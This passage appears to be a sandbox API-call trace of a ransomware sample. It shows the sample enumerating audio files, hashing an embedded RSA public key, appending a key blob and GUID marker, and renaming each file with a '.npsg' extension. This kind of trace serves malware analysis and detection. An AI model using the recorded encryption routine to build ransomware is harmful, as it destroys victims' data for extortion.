KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0238.151] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.151] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.151] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0238.152] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0238.152] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0238.152] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0238.152] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0238.152] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0238.152] GetLastError () returned 0x0 [0238.152] CryptDestroyHash (hHash=0x33f0408) returned 1 [0238.152] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0238.153] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0238.153] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0238.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.153] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0238.153] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0238.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0238.154] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x162ce, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.154] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0238.154] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0238.155] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0238.155] CloseHandle (hObject=0x644) returned 1 [0238.156] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.156] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x3b83cd0 [0238.157] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\owB8mF5PoRyx.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\owb8mf5poryx.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\owB8mF5PoRyx.mp3.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\owb8mf5poryx.mp3.npsg")) returned 1 [0238.158] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96393800, ftCreationTime.dwHighDateTime=0x1d5b6f6, ftLastAccessTime.dwLowDateTime=0x67bd0180, ftLastAccessTime.dwHighDateTime=0x1d5be87, ftLastWriteTime.dwLowDateTime=0x67bd0180, ftLastWriteTime.dwHighDateTime=0x1d5be87, nFileSizeHigh=0x0, nFileSizeLow=0xe6f9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ru8sq236NGxYT5cO8z.m4a", cAlternateFileName="RU8SQ2~1.M4A")) returned 1 [0238.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e690 [0238.159] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\ru8sq236NGxYT5cO8z.m4a") returned=".m4a" [0238.159] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\ru8sq236NGxYT5cO8z.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\ru8sq236ngxyt5co8z.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0238.160] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=59129) returned 1 [0238.160] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0238.163] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xe6d3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.163] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0238.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.165] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0xe6f9, lpOverlapped=0x0) returned 1 [0238.166] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.166] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0238.166] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.166] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.166] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0238.167] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0238.167] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0238.167] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0238.168] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0238.168] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0238.168] GetLastError () returned 0x0 [0238.168] CryptDestroyHash (hHash=0x33f0408) returned 1 [0238.168] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0238.168] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0238.168] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0238.168] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.168] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0238.168] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0238.169] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0238.169] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xe6f9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.169] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0238.170] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0238.170] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0238.170] CloseHandle (hObject=0x644) returned 1 [0238.171] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e728 [0238.171] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x3b83cd0 [0238.171] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\ru8sq236NGxYT5cO8z.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\ru8sq236ngxyt5co8z.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\ru8sq236NGxYT5cO8z.m4a.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\ru8sq236ngxyt5co8z.m4a.npsg")) returned 1 [0238.173] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70a6d850, ftCreationTime.dwHighDateTime=0x1d5c0af, ftLastAccessTime.dwLowDateTime=0xa55eb390, ftLastAccessTime.dwHighDateTime=0x1d5c03e, ftLastWriteTime.dwLowDateTime=0xa55eb390, ftLastWriteTime.dwHighDateTime=0x1d5c03e, nFileSizeHigh=0x0, nFileSizeLow=0xa57f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UMoLnftPiMHJ35Im.mp3", cAlternateFileName="UMOLNF~1.MP3")) returned 1 [0238.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e690 [0238.174] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\UMoLnftPiMHJ35Im.mp3") returned=".mp3" [0238.174] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\UMoLnftPiMHJ35Im.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\umolnftpimhj35im.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0238.178] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=42367) returned 1 [0238.178] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0238.180] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xa559, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.181] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0238.182] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.183] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0xa57f, lpOverlapped=0x0) returned 1 [0238.184] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0238.184] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.184] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.184] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0238.185] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0238.185] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0238.185] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0238.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0238.185] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0238.185] GetLastError () returned 0x0 [0238.185] CryptDestroyHash (hHash=0x33f0408) returned 1 [0238.185] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0238.185] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0238.185] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0238.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.185] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0238.186] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0238.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0238.187] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xa57f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.187] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0238.187] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0238.187] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0238.187] CloseHandle (hObject=0x644) returned 1 [0238.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e728 [0238.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x3b83cd0 [0238.188] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\UMoLnftPiMHJ35Im.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\umolnftpimhj35im.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\UMoLnftPiMHJ35Im.mp3.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\umolnftpimhj35im.mp3.npsg")) returned 1 [0238.191] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b7ade70, ftCreationTime.dwHighDateTime=0x1d5b5d6, ftLastAccessTime.dwLowDateTime=0x27b818a0, ftLastAccessTime.dwHighDateTime=0x1d5c403, ftLastWriteTime.dwLowDateTime=0x27b818a0, ftLastWriteTime.dwHighDateTime=0x1d5c403, nFileSizeHigh=0x0, nFileSizeLow=0x17f5d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="v4b8mFeC7.wav", cAlternateFileName="V4B8MF~1.WAV")) returned 1 [0238.191] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.191] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x64e690 [0238.191] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\v4b8mFeC7.wav") returned=".wav" [0238.191] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\v4b8mFeC7.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\v4b8mfec7.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0238.192] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=98141) returned 1 [0238.192] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0238.195] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x17f37, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.195] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0238.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.197] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x17f5d, lpOverlapped=0x0) returned 1 [0238.198] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.198] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0238.198] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.198] lstrlenA (lpString="-----BEGIN PUBLIC 